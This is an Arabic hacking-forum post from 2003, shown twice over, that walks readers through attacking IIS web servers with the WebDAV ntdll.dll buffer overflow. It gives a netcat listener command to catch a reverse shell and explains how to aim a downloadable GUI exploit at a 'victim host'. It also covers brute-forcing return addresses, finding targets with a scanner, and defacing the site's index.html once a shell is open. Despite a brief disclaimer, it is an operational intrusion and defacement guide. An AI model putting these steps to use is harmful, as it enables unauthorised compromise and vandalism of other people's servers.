Smart c0d3r
31-08-2003, 05:04
السلام عليكم
"أرجوا عدم استخدام الثغرة فيما حرمه الله وانا ابرئ ذمتي من كل استخدام محرم"
شباب الثغرة هذه سهلة وان شا الله تستخدموها في خير:)
الثغره باختصار تسمح بحدوث بفر اوفر فلو في الملف ntdll.dll في سريفرات ال iis ..
طريقه الاستخدام ..
اولا باستخدام الاداه نت كات ..افتح بورتا في جهازك كالتالي..
ادخل الى الفولدر الموجود فيه النت كات و اكتب التالي :
nc -L -vv -p 666
or
nc.exe -L -vv -p 666
بعد ذلك باستخدام الاكسبلويت دات البيئه الرسوميه .. و المسماه xwbf v-0.3.exe
اكتب في خانه ال satan ip رقم الايبي الخاص بك .
و في خانه ال victim host عنوان الموقع المستهدف
satan port البورت اللي فتحته في جهازك بالنت كات و هو 666
ثم اضغط exploit ..
طبعا ميزه هذه الاداه الرسوميه انها تستخدم costum pads >> و اذا لم تصلح هذه الret addrs فانها تلجا الى ال brute force و تجرب 250 return addrs ..
طبعا فيه سكانر دوروا عليه اسمه webdav scan بس ده بيبحث عن المواقع اللي فيها الويب ديف .... و ليس المواقع المصابه ..يعني ممكن تكون مصابه و ممكن تكون لا
لو الاكسبلويت نجحت المفروض انك تلاقي في شاشه الدوس بتاعه النت كات شل للويندوز عاده بيكون
c:\windows\system32>
كده مبروك انت اخترقت الموقع ! اكتب باه الاوامر بتاعتك مثلا :
echo i hacked this site >c:\inetpub\wwwroot\index.html
...بالنسبه للنت كات ممكن تحملها من اي موقع لو انت بحثت عنها ..اما الاكسبلويت فهي ممكن تحملها من هنا :
http://members.lycos.co.uk/linuxdude/xwbf-v0.3.exe
او ممكن تبحث عنها !
يمكنكم التعرف اكثر على ثغرة بفر اوفر فلو من جزئين:-
http://www.3asfh.com/vb/showthread.php?s=&threadid=3390
http://www.3asfh.com/vb/showthread.php?s=&threadid=3667
تحياتي منقوووول|4|
"أرجوا عدم استخدام الثغرة فيما حرمه الله وانا ابرئ ذمتي من كل استخدام محرم"
شباب الثغرة هذه سهلة وان شا الله تستخدموها في خير:)
الثغره باختصار تسمح بحدوث بفر اوفر فلو في الملف ntdll.dll في سريفرات ال iis ..
طريقه الاستخدام ..
اولا باستخدام الاداه نت كات ..افتح بورتا في جهازك كالتالي..
ادخل الى الفولدر الموجود فيه النت كات و اكتب التالي :
nc -L -vv -p 666
or
nc.exe -L -vv -p 666
بعد ذلك باستخدام الاكسبلويت دات البيئه الرسوميه .. و المسماه xwbf v-0.3.exe
اكتب في خانه ال satan ip رقم الايبي الخاص بك .
و في خانه ال victim host عنوان الموقع المستهدف
satan port البورت اللي فتحته في جهازك بالنت كات و هو 666
ثم اضغط exploit ..
طبعا ميزه هذه الاداه الرسوميه انها تستخدم costum pads >> و اذا لم تصلح هذه الret addrs فانها تلجا الى ال brute force و تجرب 250 return addrs ..
طبعا فيه سكانر دوروا عليه اسمه webdav scan بس ده بيبحث عن المواقع اللي فيها الويب ديف .... و ليس المواقع المصابه ..يعني ممكن تكون مصابه و ممكن تكون لا
لو الاكسبلويت نجحت المفروض انك تلاقي في شاشه الدوس بتاعه النت كات شل للويندوز عاده بيكون
c:\windows\system32>
كده مبروك انت اخترقت الموقع ! اكتب باه الاوامر بتاعتك مثلا :
echo i hacked this site >c:\inetpub\wwwroot\index.html
...بالنسبه للنت كات ممكن تحملها من اي موقع لو انت بحثت عنها ..اما الاكسبلويت فهي ممكن تحملها من هنا :
http://members.lycos.co.uk/linuxdude/xwbf-v0.3.exe
او ممكن تبحث عنها !
يمكنكم التعرف اكثر على ثغرة بفر اوفر فلو من جزئين:-
http://www.3asfh.com/vb/showthread.php?s=&threadid=3390
http://www.3asfh.com/vb/showthread.php?s=&threadid=3667
تحياتي منقوووول|4|